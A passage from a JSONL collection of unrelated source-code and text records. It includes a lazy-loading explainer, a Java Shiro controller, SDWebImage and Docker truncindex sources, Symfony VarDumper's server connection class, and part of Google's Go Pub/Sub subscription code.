\"images/thumbs/att.jpg\",\n\t\t\t\t\t\"x\": \"0.3750\",\n\t\t\t\t\t\"y\": \"0.5391\"\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t]\n}"} {"text": "# Lazy Loading\n\n## [Krzysztof Grzybek](https://github.com/krzysztof-grzybek)\n\nLazy loading is a pattern in which we delay loading the data until it's actually needed. Lazy loading data from the database is usually achieved by Implementing proper Proxy class.\n\nIt might be useful if we have an object which requires a lot of data to be fetched from the database, but probably we don't need all the data in every case. It might reduce object initialization phase and memory usage.\n\nOn the other hand, we might end up with a lot of database queries to get small chunks of data, and it might cause performance problems. It's not so hard to do that because lazy loading is a very leaking abstraction.\n\nAnother pitfall, probably more important is that we might work with inconsistent data. If we loaded user data first, and then after some time we loaded user orders, we can't be sure that the orders data wasn't modified already by someone else.\n"} {"text": "fileFormatVersion: 2\nguid: 2e3b9bbf2c1a3cd4f88883ca32882ec6\nMonoImporter:\n externalObjects: {}\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/*\n * Copyright (c) 2018\n * All rights reserved.\n * 2018-08-22 19:58:32\n */\npackage com.ueboot.shiro.controller.resources;\n\nimport com.alibaba.fastjson.JSON;\nimport com.ueboot.core.http.response.Response;\nimport com.ueboot.shiro.controller.resources.vo.*;\nimport com.ueboot.shiro.entity.Resources;\nimport com.ueboot.shiro.service.resources.ResourcesService;\nimport com.ueboot.shiro.shiro.ShiroEventListener;\nimport jodd.util.StringUtil;\nimport lombok.extern.slf4j.Slf4j;\nimport org.apache.shiro.SecurityUtils;\nimport org.apache.shiro.authz.annotation.RequiresPermissions;\nimport org.apache.shiro.util.Assert;\nimport org.springframework.beans.BeanUtils;\nimport org.springframework.data.domain.Page;\nimport org.springframework.data.domain.Pageable;\nimport org.springframework.data.domain.Sort;\nimport org.springframework.data.web.PageableDefault;\nimport org.springframework.web.bind.annotation.*;\n\nimport javax.annotation.Resource;\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\n\n/**\n * Created on 2018-08-22 19:58:32\n *\n * @author yangkui\n * @since 2.1.0 by ueboot-generator\n */\n@Slf4j\n@RestController\n@RequestMapping(value = \"/ueboot/resources\")\npublic class ResourcesController {\n\n @Resource\n private ResourcesService resourcesService;\n\n // shiro权限记录\n @Resource\n private ShiroEventListener shiroEventListener;\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @PostMapping(value = \"/list\")\n public Response> list() {\n List all = this.resourcesService.findAll();\n List retval = new ArrayList<>();\n all.forEach((r) -> {\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(r, resp);\n if (r.getParent() != null) {\n resp.setParentId(r.getParent().getId());\n }\n retval.add(resp);\n });\n return new Response<>(retval);\n }\n\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @PostMapping(value = \"/page\")\n public Response> page(@PageableDefault(value = 15, sort = {\"id\"}, direction = Sort.Direction.ASC)\n Pageable pageable, @RequestBody(required = false) ResourcesFindReq req) {\n Page entities = null;\n entities = resourcesService.findByParentId(pageable, req.getParentId());\n Page body = entities.map(entity -> {\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(entity, resp);\n if (entity.getParent() != null) {\n resp.setParentId(entity.getParent().getId());\n }\n return resp;\n });\n\n return new Response<>(body);\n }\n\n\n @RequiresPermissions(\"ueboot:resources:save\")\n @PostMapping(value = \"/save\")\n public Response save(@RequestBody ResourcesReq req) {\n Resources entity = null;\n if (req.getId() == null) {\n entity = new Resources();\n } else {\n entity = resourcesService.get(req.getId());\n }\n BeanUtils.copyProperties(req, entity);\n //菜单样式配置\n Map theme = new HashMap<>();\n if (StringUtil.isNotBlank(req.getIconName())) {\n theme.put(\"iconName\", req.getIconName());\n }\n if (StringUtil.isNotBlank(req.getFontColor())) {\n theme.put(\"fontColor\", req.getFontColor());\n }\n if (theme.size() > 0) {\n entity.setThemeJson(JSON.toJSONString(theme));\n } else {\n entity.setThemeJson(null);\n }\n if (req.getParentId() != 0L) {\n Resources parent = resourcesService.findById(req.getParentId());\n Assert.notNull(parent, \"父节点不存在\");\n entity.setParent(parent);\n entity.setParentName(parent.getName());\n } else {\n entity.setParent(null);\n entity.setParentName(null);\n }\n\n resourcesService.save(entity);\n\n // 保存/修改资源日志记录\n String optUserName = (String) SecurityUtils.getSubject().getPrincipal();\n this.shiroEventListener.saveResourceEvent(optUserName, req.getName());\n return new Response<>();\n }\n\n @RequiresPermissions(\"ueboot:resources:delete\")\n @PostMapping(value = \"/delete\")\n public Response delete(Long[] id) {\n resourcesService.deleteResource(id);\n return new Response<>();\n }\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @GetMapping(value = \"/{id}\")\n public Response get(@PathVariable Long id) {\n Resources entity = resourcesService.get(id);\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(entity, resp);\n return new Response<>(resp);\n }\n\n}\n"} {"text": "/*\n * This file is part of the SDWebImage package.\n * (c) Olivier Poitrey \n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\n#import \n#import \"SDWebImageDownloader.h\"\n#import \"SDWebImageOperation.h\"\n\n/**\n Describes a downloader operation. If one wants to use a custom downloader op, it needs to inherit from `NSOperation` and conform to this protocol\n For the description about these methods, see `SDWebImageDownloaderOperation`\n @note If your custom operation class does not use `NSURLSession` at all, do not implement the optional methods and session delegate methods.\n */\n@protocol SDWebImageDownloaderOperation \n@required\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options;\n\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options\n context:(nullable SDWebImageContext *)context;\n\n- (nullable id)addHandlersForProgress:(nullable SDWebImageDownloaderProgressBlock)progressBlock\n completed:(nullable SDWebImageDownloaderCompletedBlock)completedBlock;\n\n- (BOOL)cancel:(nullable id)token;\n\n@property (strong, nonatomic, readonly, nullable) NSURLRequest *request;\n@property (strong, nonatomic, readonly, nullable) NSURLResponse *response;\n\n@optional\n@property (strong, nonatomic, readonly, nullable) NSURLSessionTask *dataTask;\n@property (strong, nonatomic, nullable) NSURLCredential *credential;\n@property (assign, nonatomic) double minimumProgressInterval;\n\n@end\n\n\n/**\n The download operation class for SDWebImageDownloader.\n */\n@interface SDWebImageDownloaderOperation : NSOperation \n\n/**\n * The request used by the operation's task.\n */\n@property (strong, nonatomic, readonly, nullable) NSURLRequest *request;\n\n/**\n * The response returned by the operation's task.\n */\n@property (strong, nonatomic, readonly, nullable) NSURLResponse *response;\n\n/**\n * The operation's task\n */\n@property (strong, nonatomic, readonly, nullable) NSURLSessionTask *dataTask;\n\n/**\n * The credential used for authentication challenges in `-URLSession:task:didReceiveChallenge:completionHandler:`.\n *\n * This will be overridden by any shared credentials that exist for the username or password of the request URL, if present.\n */\n@property (strong, nonatomic, nullable) NSURLCredential *credential;\n\n/**\n * The minimum interval about progress percent during network downloading. Which means the next progress callback and current progress callback's progress percent difference should be larger or equal to this value. However, the final finish download progress callback does not get effected.\n * The value should be 0.0-1.0.\n * @note If you're using progressive decoding feature, this will also effect the image refresh rate.\n * @note This value may enhance the performance if you don't want progress callback too frequently.\n * Defaults to 0, which means each time we receive the new data from URLSession, we callback the progressBlock immediately.\n */\n@property (assign, nonatomic) double minimumProgressInterval;\n\n/**\n * The options for the receiver.\n */\n@property (assign, nonatomic, readonly) SDWebImageDownloaderOptions options;\n\n/**\n * The context for the receiver.\n */\n@property (copy, nonatomic, readonly, nullable) SDWebImageContext *context;\n\n/**\n * Initializes a `SDWebImageDownloaderOperation` object\n *\n * @see SDWebImageDownloaderOperation\n *\n * @param request the URL request\n * @param session the URL session in which this operation will run\n * @param options downloader options\n *\n * @return the initialized instance\n */\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options;\n\n/**\n * Initializes a `SDWebImageDownloaderOperation` object\n *\n * @see SDWebImageDownloaderOperation\n *\n * @param request the URL request\n * @param session the URL session in which this operation will run\n * @param options downloader options\n * @param context A context contains different options to perform specify changes or processes, see `SDWebImageContextOption`. This hold the extra objects which `options` enum can not hold.\n *\n * @return the initialized instance\n */\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options\n context:(nullable SDWebImageContext *)context NS_DESIGNATED_INITIALIZER;\n\n/**\n * Adds handlers for progress and completion. Returns a tokent that can be passed to -cancel: to cancel this set of\n * callbacks.\n *\n * @param progressBlock the block executed when a new chunk of data arrives.\n * @note the progress block is executed on a background queue\n * @param completedBlock the block executed when the download is done.\n * @note the completed block is executed on the main queue for success. If errors are found, there is a chance the block will be executed on a background queue\n *\n * @return the token to use to cancel this set of handlers\n */\n- (nullable id)addHandlersForProgress:(nullable SDWebImageDownloaderProgressBlock)progressBlock\n completed:(nullable SDWebImageDownloaderCompletedBlock)completedBlock;\n\n/**\n * Cancels a set of callbacks. Once all callbacks are canceled, the operation is cancelled.\n *\n * @param token the token representing a set of callbacks to cancel\n *\n * @return YES if the operation was stopped because this was the last token to be canceled. NO otherwise.\n */\n- (BOOL)cancel:(nullable id)token;\n\n@end\n"} {"text": "// Package truncindex provides a general 'index tree', used by Docker\n// in order to be able to reference containers by only a few unambiguous\n// characters of their id.\npackage truncindex\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"strings\"\n\t\"sync\"\n\n\t\"github.com/tchap/go-patricia/patricia\"\n)\n\nvar (\n\t// ErrEmptyPrefix is an error returned if the prefix was empty.\n\tErrEmptyPrefix = errors.New(\"Prefix can't be empty\")\n\n\t// ErrIllegalChar is returned when a space is in the ID\n\tErrIllegalChar = errors.New(\"illegal character: ' '\")\n\n\t// ErrNotExist is returned when ID or its prefix not found in index.\n\tErrNotExist = errors.New(\"ID does not exist\")\n)\n\n// ErrAmbiguousPrefix is returned if the prefix was ambiguous\n// (multiple ids for the prefix).\ntype ErrAmbiguousPrefix struct {\n\tprefix string\n}\n\nfunc (e ErrAmbiguousPrefix) Error() string {\n\treturn fmt.Sprintf(\"Multiple IDs found with provided prefix: %s\", e.prefix)\n}\n\n// TruncIndex allows the retrieval of string identifiers by any of their unique prefixes.\n// This is used to retrieve image and container IDs by more convenient shorthand prefixes.\ntype TruncIndex struct {\n\tsync.RWMutex\n\ttrie *patricia.Trie\n\tids map[string]struct{}\n}\n\n// NewTruncIndex creates a new TruncIndex and initializes with a list of IDs.\nfunc NewTruncIndex(ids []string) (idx *TruncIndex) {\n\tidx = &TruncIndex{\n\t\tids: make(map[string]struct{}),\n\n\t\t// Change patricia max prefix per node length,\n\t\t// because our len(ID) always 64\n\t\ttrie: patricia.NewTrie(patricia.MaxPrefixPerNode(64)),\n\t}\n\tfor _, id := range ids {\n\t\tidx.addID(id)\n\t}\n\treturn\n}\n\nfunc (idx *TruncIndex) addID(id string) error {\n\tif strings.Contains(id, \" \") {\n\t\treturn ErrIllegalChar\n\t}\n\tif id == \"\" {\n\t\treturn ErrEmptyPrefix\n\t}\n\tif _, exists := idx.ids[id]; exists {\n\t\treturn fmt.Errorf(\"id already exists: '%s'\", id)\n\t}\n\tidx.ids[id] = struct{}{}\n\tif inserted := idx.trie.Insert(patricia.Prefix(id), struct{}{}); !inserted {\n\t\treturn fmt.Errorf(\"failed to insert id: %s\", id)\n\t}\n\treturn nil\n}\n\n// Add adds a new ID to the TruncIndex.\nfunc (idx *TruncIndex) Add(id string) error {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\treturn idx.addID(id)\n}\n\n// Delete removes an ID from the TruncIndex. If there are multiple IDs\n// with the given prefix, an error is thrown.\nfunc (idx *TruncIndex) Delete(id string) error {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\tif _, exists := idx.ids[id]; !exists || id == \"\" {\n\t\treturn fmt.Errorf(\"no such id: '%s'\", id)\n\t}\n\tdelete(idx.ids, id)\n\tif deleted := idx.trie.Delete(patricia.Prefix(id)); !deleted {\n\t\treturn fmt.Errorf(\"no such id: '%s'\", id)\n\t}\n\treturn nil\n}\n\n// Get retrieves an ID from the TruncIndex. If there are multiple IDs\n// with the given prefix, an error is thrown.\nfunc (idx *TruncIndex) Get(s string) (string, error) {\n\tif s == \"\" {\n\t\treturn \"\", ErrEmptyPrefix\n\t}\n\tvar (\n\t\tid string\n\t)\n\tsubTreeVisitFunc := func(prefix patricia.Prefix, item patricia.Item) error {\n\t\tif id != \"\" {\n\t\t\t// we haven't found the ID if there are two or more IDs\n\t\t\tid = \"\"\n\t\t\treturn ErrAmbiguousPrefix{prefix: string(prefix)}\n\t\t}\n\t\tid = string(prefix)\n\t\treturn nil\n\t}\n\n\tidx.RLock()\n\tdefer idx.RUnlock()\n\tif err := idx.trie.VisitSubtree(patricia.Prefix(s), subTreeVisitFunc); err != nil {\n\t\treturn \"\", err\n\t}\n\tif id != \"\" {\n\t\treturn id, nil\n\t}\n\treturn \"\", ErrNotExist\n}\n\n// Iterate iterates over all stored IDs and passes each of them to the given\n// handler. Take care that the handler method does not call any public\n// method on truncindex as the internal locking is not reentrant/recursive\n// and will result in deadlock.\nfunc (idx *TruncIndex) Iterate(handler func(id string)) {\n\tidx.Lock()\n\tdefer idx.Unlock()\n\tidx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error {\n\t\thandler(string(prefix))\n\t\treturn nil\n\t})\n}\n"} {"text": "using Android.Views;\n\nnamespace Camera2Basic.Listeners\n{\n public class Camera2BasicSurfaceTextureListener : Java.Lang.Object, TextureView.ISurfaceTextureListener\n {\n private readonly Camera2BasicFragment owner;\n\n public Camera2BasicSurfaceTextureListener(Camera2BasicFragment owner)\n {\n if (owner == null)\n throw new System.ArgumentNullException(\"owner\");\n this.owner = owner;\n }\n\n public void OnSurfaceTextureAvailable(Android.Graphics.SurfaceTexture surface, int width, int height)\n {\n owner.OpenCamera(width, height);\n }\n\n public bool OnSurfaceTextureDestroyed(Android.Graphics.SurfaceTexture surface)\n {\n return true;\n }\n\n public void OnSurfaceTextureSizeChanged(Android.Graphics.SurfaceTexture surface, int width, int height)\n {\n owner.ConfigureTransform(width, height);\n }\n\n public void OnSurfaceTextureUpdated(Android.Graphics.SurfaceTexture surface)\n {\n\n }\n }\n}"} {"text": "/**\n * @file shellex/command.hpp\n *\n * @copyright 2018-2020 Bill Zissimopoulos\n */\n/*\n * This file is part of WinSpd.\n *\n * You can redistribute it and/or modify it under the terms of the GNU\n * General Public License version 3 as published by the Free Software\n * Foundation.\n *\n * Licensees holding a valid commercial license may use this software\n * in accordance with the commercial license agreement provided in\n * conjunction with the software. The terms and conditions of any such\n * commercial license agreement shall govern, supersede, and render\n * ineffective any application of the GPLv3 license to this software,\n * notwithstanding of any reference thereto in the software or\n * associated repository.\n */\n\n#ifndef WINSPD_SHELLEX_COMMAND_HPP_INCLUDED\n#define WINSPD_SHELLEX_COMMAND_HPP_INCLUDED\n\n#include \n#include \n\nclass Command : public CoObject<\n IInitializeCommand,\n IObjectWithSelection,\n IExecuteCommand,\n IExplorerCommandState>\n{\npublic:\n /* IInitializeCommand */\n STDMETHODIMP Initialize(LPCWSTR CommandName, IPropertyBag *Bag)\n {\n return S_OK;\n }\n\n /* IObjectWithSelection */\n STDMETHODIMP SetSelection(IShellItemArray *Array)\n {\n if (0 != _Array)\n _Array->Release();\n if (0 != Array)\n Array->AddRef();\n _Array = Array;\n return S_OK;\n }\n STDMETHODIMP GetSelection(REFIID Iid, void **PObject)\n {\n if (0 != _Array)\n return _Array->QueryInterface(Iid, PObject);\n else\n {\n *PObject = 0;\n return E_NOINTERFACE;\n }\n }\n\n /* IExecuteCommand */\n STDMETHODIMP SetKeyState(DWORD KeyState)\n {\n return S_OK;\n }\n STDMETHODIMP SetParameters(LPCWSTR Parameters)\n {\n return S_OK;\n }\n STDMETHODIMP SetPosition(POINT Point)\n {\n return S_OK;\n }\n STDMETHODIMP SetShowWindow(int Show)\n {\n return S_OK;\n }\n STDMETHODIMP SetNoShowUI(BOOL NoShowUI)\n {\n return S_OK;\n }\n STDMETHODIMP SetDirectory(LPCWSTR Directory)\n {\n return S_OK;\n }\n STDMETHODIMP Execute()\n {\n return S_OK;\n }\n\n /* IExplorerCommandState */\n STDMETHODIMP GetState(IShellItemArray *Array, BOOL OkToBeSlow, EXPCMDSTATE *CmdState)\n {\n *CmdState = ECS_ENABLED;\n return S_OK;\n }\n\n /* internal interface */\n Command() : _Array(0)\n {\n }\n ~Command()\n {\n if (0 != _Array)\n _Array->Release();\n }\n\nprotected:\n IShellItemArray *_Array;\n};\n\n#endif\n"} {"text": "\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\nnamespace Symfony\\Component\\VarDumper\\Server;\n\nuse Symfony\\Component\\VarDumper\\Cloner\\Data;\nuse Symfony\\Component\\VarDumper\\Dumper\\ContextProvider\\ContextProviderInterface;\n\n/**\n * Forwards serialized Data clones to a server.\n *\n * @author Maxime Steinhausser \n */\nclass Connection\n{\n private $host;\n private $contextProviders;\n private $socket;\n\n /**\n * @param string $host The server host\n * @param ContextProviderInterface[] $contextProviders Context providers indexed by context name\n */\n public function __construct(string $host, array $contextProviders = [])\n {\n if (false === strpos($host, '://')) {\n $host = 'tcp://'.$host;\n }\n\n $this->host = $host;\n $this->contextProviders = $contextProviders;\n }\n\n public function getContextProviders(): array\n {\n return $this->contextProviders;\n }\n\n public function write(Data $data): bool\n {\n $socketIsFresh = !$this->socket;\n if (!$this->socket = $this->socket ?: $this->createSocket()) {\n return false;\n }\n\n $context = ['timestamp' => microtime(true)];\n foreach ($this->contextProviders as $name => $provider) {\n $context[$name] = $provider->getContext();\n }\n $context = array_filter($context);\n $encodedPayload = base64_encode(serialize([$data, $context])).\"\\n\";\n\n set_error_handler([self::class, 'nullErrorHandler']);\n try {\n if (-1 !== stream_socket_sendto($this->socket, $encodedPayload)) {\n return true;\n }\n if (!$socketIsFresh) {\n stream_socket_shutdown($this->socket, STREAM_SHUT_RDWR);\n fclose($this->socket);\n $this->socket = $this->createSocket();\n }\n if (-1 !== stream_socket_sendto($this->socket, $encodedPayload)) {\n return true;\n }\n } finally {\n restore_error_handler();\n }\n\n return false;\n }\n\n private static function nullErrorHandler($t, $m)\n {\n // no-op\n }\n\n private function createSocket()\n {\n set_error_handler([self::class, 'nullErrorHandler']);\n try {\n return stream_socket_client($this->host, $errno, $errstr, 3, STREAM_CLIENT_CONNECT | STREAM_CLIENT_ASYNC_CONNECT);\n } finally {\n restore_error_handler();\n }\n }\n}\n"} {"text": "// Copyright 2016 Google Inc. All Rights Reserved.\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\npackage pubsub\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"io\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n\n\t\"cloud.google.com/go/iam\"\n\t\"golang.org/x/net/context\"\n\t\"golang.org/x/sync/errgroup\"\n\t\"google.golang.org/grpc\"\n\t\"google.golang.org/grpc/codes\"\n)\n\n// Subscription is a reference to a PubSub subscription.\ntype Subscription struct {\n\ts service\n\n\t// The fully qualified identifier for the subscription, in the format \"projects//subscriptions/\"\n\tname string\n\n\t// Settings for pulling messages. Configure these before calling Receive.\n\tReceiveSettings ReceiveSettings\n\n\tmu sync.Mutex\n\treceiveActive bool\n}\n\n// Subscription creates a reference to a subscription.\nfunc (c *Client) Subscription(id string) *Subscription {\n\treturn newSubscription(c.s, fmt.Sprintf(\"projects/%s/subscriptions/%s\", c.projectID, id))\n}\n\nfunc newSubscription(s service, name string) *Subscription {\n\treturn &Subscription{\n\t\ts: s,\n\t\tname: name,\n\t}\n}\n\n// String returns the globally unique printable name of the subscription.\nfunc (s *Subscription) String() string {\n\treturn s.name\n}\n\n// ID returns the unique identifier of the subscription within its project.\nfunc (s *Subscription) ID() string {\n\tslash := strings.LastIndex(s.name, \"/\")\n\tif slash == -1 {\n\t\t// name is not a fully-qualified name.\n\t\tpanic(\"bad subscription name\")\n\t}\n\treturn s.name[slash+1:]\n}\n\n// Subscriptions returns an iterator which returns all of the subscriptions for the client's project.\nfunc (c *Client) Subscriptions(ctx context.Context) *SubscriptionIterator {\n\treturn &SubscriptionIterator{\n\t\ts: c.s,\n\t\tnext: c.s.listProjectSubscriptions(ctx, c.fullyQualifiedProjectName()),\n\t}\n}\n\n// SubscriptionIterator is an iterator that returns a series of subscriptions.\ntype SubscriptionIterator struct {\n\ts service\n\tnext nextStringFunc\n}\n\n// Next returns the next subscription. If there are no more subscriptions, iterator.Done will be returned.\nfunc (subs *SubscriptionIterator) Next() (*Subscription, error) {\n\tsubName, err := subs.next()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn newSubscription(subs.s, subName), nil\n}\n\n// PushConfig contains configuration for subscriptions that operate in push mode.\ntype PushConfig struct {\n\t// A URL locating the endpoint to which messages should be pushed.\n\tEndpoint string\n\n\t// Endpoint configuration attributes. See https://cloud.google.com/pubsub/docs/reference/rest/v1/projects.subscriptions#pushconfig for more details.\n\tAttributes map[string]string\n}\n\n// Subscription config contains the configuration of a subscription.\ntype SubscriptionConfig struct {\n\tTopic *Topic\n\tPushConfig PushConfig\n\n\t// The default maximum time after a subscriber receives a message before\n\t// the subscriber should acknowledge the message. Note: messages which are\n\t// obtained via Subscription.Receive need not be acknowledged within this\n\t// deadline, as the deadline will be automatically extended.\n\tAckDeadline time.Duration\n\n\t// Whether to retain acknowledged messages. If true, acknowledged messages\n\t// will not be expunged until they fall out of the RetentionDuration window.\n\tretainAckedMessages bool\n\n\t// How long to retain messages in backlog, from the time of publish. If RetainAckedMessages is true,\n\t// this duration affects the retention of acknowledged messages,\n\t// otherwise only unacknowledged messages are retained.\n\t// Defaults to 7 days. Cannot be longer than 7 days or shorter than 10 minutes.\n\tretentionDuration time.Duration\n}\n\n// ReceiveSettings configure the Receive method.\n// A zero ReceiveSettings will result in values equivalent to DefaultReceiveSettings.\ntype ReceiveSettings struct {\n\t// MaxExtension is the maximum period for which the Subscription should\n\t// automatically extend the ack deadline for each message.\n\t//\n\t// The Subscription will automatically extend the ack deadline of all\n\t// fetched Messages for the duration specified. Automatic deadline\n\t// extension may be disabled by specifying a duration less than 1.\n\tMaxExtension time.Duration\n\n\t// MaxOutstandingMessages is the maximum number of unprocessed messages\n\t// (unacknowledged but not yet expired). If MaxOutstandingMessages is 0, it\n\t// will be treated as if it were DefaultReceiveSettings.MaxOutstandingMessages.\n\t// If the value is negative, then there will be no limit on the number of\n\t// unprocessed messages.\n\tMaxOutstandingMessages int\n\n\t// MaxOutstandingBytes is the maximum size of unprocessed messages\n\t// (unacknowledged but not yet expired). If MaxOutstandingBytes is 0, it will\n\t// be treated as if it were DefaultReceiveSettings.MaxOutstandingBytes. If\n\t// the value is negative, then there will be no limit on the number of bytes\n\t// for unprocessed messages.\n\tMaxOutstandingBytes int\n\n\t// NumGoroutines is the number of goroutines Receive will spawn to pull\n\t// messages concurrently. If NumGoroutines is less than 1, it will be treated\n\t// as if it were DefaultReceiveSettings.NumGoroutines.\n\t//\n\t// NumGoroutines does not limit the number of messages that can be processed\n\t// concurrently. Even with one goroutine, many messages might be processed at\n\t// once, because that goroutine may continually receive messages and invoke the\n\t// function passed to Receive on them. To limit the number of messages being\n\t// processed concurrently, set MaxOutstandingMessages.\n\tNumGoroutines int\n}\n\n// DefaultReceiveSettings holds the default values for ReceiveSettings.\nvar DefaultReceiveSettings = ReceiveSettings{\n\tMaxExtension: 10 * time.Minute,\n\tMaxOutstandingMessages: 1000,\n\tMaxOutstandingBytes: 1e9, // 1G\n\tNumGoroutines: 1,\n}\n\n// Delete deletes the subscription.\nfunc (s *Subscription) Delete(ctx context.Context) error {\n\treturn s.s.deleteSubscription(ctx, s.name)\n}\n\n// Exists reports whether the subscription exists on the server.\nfunc (s *Subscription) Exists(ctx context.Context) (bool, error) {\n\treturn s.s.subscriptionExists(ctx, s.name)\n}\n\n// Config fetches the current configuration for the subscription.\nfunc (s *Subscription) Config(ctx context.Context) (SubscriptionConfig, error) {\n\tconf, topicName, err := s.s.getSubscriptionConfig(ctx, s.name)\n\tif err != nil {\n\t\treturn SubscriptionConfig{}, err\n\t}\n\tconf.Topic = &Topic{\n\t\ts: s.s,\n\t\tname: topicName,\n\t}\n\treturn conf, nil\n}\n\n// SubscriptionConfigToUpdate describes how to update a subscription.\ntype SubscriptionConfigToUpdate struct {\n\t// If non-nil, the push config is changed.\n\tPushConfig *PushConfig\n}\n\n// Update changes an existing subscription according to the fields set in cfg.\n// It returns the new SubscriptionConfig.\n//\n// Update returns an error if no fields were modified.\nfunc (s *Subscription) Update(ctx context.Context, cfg SubscriptionConfigToUpdate) (SubscriptionConfig, error) {\n\tif cfg.PushConfig == nil {\n\t\treturn SubscriptionConfig{}, errors.New(\"pubsub: UpdateSubscription call with nothing to update\")\n\t}\n\tif err := s.s.modifyPushConfig(ctx, s.name, *cfg.PushConfig); err != nil {\n\t\treturn SubscriptionConfig{}, err\n\t}\n\treturn s.Config(ctx)\n}\n\nfunc (s *Subscription) IAM() *iam.Handle {\n\treturn s.s.iamHandle(s.name)\n}\n\n// CreateSubscription creates a new subscription on a topic.\n//\n// id is the name of the subscription to create. It must start with a letter,\n// and contain only letters ([A-Za-z]), numbers ([0-9]), dashes (-),\n// underscores (_), periods (.), tildes (~), plus (+) or percent signs (%). It\n// must be between 3 and 255 characters in length, and must not start with\n// \"goog\".\n//\n// cfg.Topic is the topic from which the subscription should receive messages. It\n// need not belong to the same project as the subscription. This field is required.\n//\n// cfg.AckDeadline is the maximum time after a subscriber receives a message before\n// the subscriber should acknowledge the message. It must be between 10 and 600\n// seconds (inclusive), and is rounded down to the nearest second. If the\n// provided ackDeadline is 0, then the default value of 10 seconds is used.\n// Note: messages which are obtained via Subscription.Receive need not be\n// acknowledged within this deadline, as the deadline will be automatically\n// extended.\n//\n// cfg.PushConfig may be set to configure this subscription for push delivery.\n//\n// If the subscription already exists an error will be returned.\nfunc (c *Client) CreateSubscription(ctx context.Context, id string, cfg SubscriptionConfig) (*Subscription, error) {\n\tif cfg.Topic == nil {\n\t\treturn nil, errors.New(\"pubsub: require non-nil Topic\")\n\t}\n\tif cfg.AckDeadline == 0 {\n\t\tcfg.AckDeadline = 10 * time.Second\n\t}\n\tif d := cfg.AckDeadline; d < 10*time.Second || d > 600*time.Second {\n\t\treturn nil, fmt.Errorf(\"ack deadline must be between 10 and 600 seconds; got: %v\", d)\n\t}\n\n\tsub := c.Subscription(id)\n\terr := c.s.createSubscription(ctx, sub.name, cfg)\n\treturn sub, err\n}\n\nvar errReceiveInProgress = errors.New(\"pubsub: Receive already in progress for this subscription\")\n\n// Receive calls f with the outstanding messages from the subscription.\n// It blocks until ctx is done, or the service returns a non-retryable error.\n//\n// The standard way to terminate a Receive is to cancel its context:\n//\n// cctx, cancel := context.WithCancel(ctx)\n// err := sub.Receive(cctx, callback)\n// // Call cancel from callback, or another goroutine.\n//\n// If the service returns a non-retryable error, Receive returns that error after\n// all of the outstanding calls to f have returned. If ctx is done, Receive\n// returns nil after all of the outstanding calls to f have returned and\n// all messages have been acknowledged or have expired.\n//\n// Receive calls f concurrently from multiple goroutines. It is encouraged to\n// process messages synchronously in f, even if that processing is relatively\n// time-consuming; Receive will spawn new goroutines for incoming messages,\n// limited by MaxOutstandingMessages and MaxOutstandingBytes in ReceiveSettings.\n//\n// The context passed to f will be canceled when ctx is Done or there is a\n// fatal service error.\n//\n// Receive will automatically extend the ack deadline of all fetched Messages for the\n// period specified by s.ReceiveSettings.MaxExtension.\n//\n// Each Subscription may have only one invocation of Receive active at a time.\nfunc (s *Subscription) Receive(ctx context.Context, f func(context.Context, *Message)) error {\n\ts.mu.Lock()\n\tif s.receiveActive {\n\t\ts.mu.Unlock()\n\t\treturn errReceiveInProgress\n\t}\n\ts.receiveActive = true\n\ts.mu.Unlock()\n\tdefer func() { s.mu.Lock(); s.receiveActive = false; s.mu.Unlock() }()\n\n\tconfig, err := s.Config(ctx)\n\tif err != nil {\n\t\tif grpc.Code(err) == codes.Canceled {\n\t\t\treturn nil\n\t\t}\n\t\treturn err\n\t}\n\tmaxCount := s.ReceiveSettings.MaxOutstandingMessages\n\tif maxCount == 0 {\n\t\tmaxCount = DefaultReceiveSettings.MaxOutstandingMessages\n\t}\n\tmaxBytes := s.ReceiveSettings.MaxOutstandingBytes\n\tif maxBytes == 0 {\n\t\tmaxBytes = DefaultReceiveSettings.MaxOutstandingBytes\n\t}\n\tmaxExt := s.ReceiveSettings.MaxExtension\n\tif maxExt == 0 {\n\t\tmaxExt = DefaultReceiveSettings.MaxExtension\n\t} else if maxExt < 0 {\n\t\t// If MaxExtension is negative, disable automatic extension.\n\t\tmaxExt = 0\n\t}\n\tnumGoroutines := s.ReceiveSettings.NumGoroutines\n\tif numGoroutines < 1 {\n\t\tnumGoroutines = DefaultReceiveSettings.NumGoroutines\n\t}\n\t// TODO(jba): add tests that verify that ReceiveSettings are correctly processed.\n\tpo := &pullOptions{\n\t\tmaxExtension: maxExt,\n\t\tmaxPrefetch: 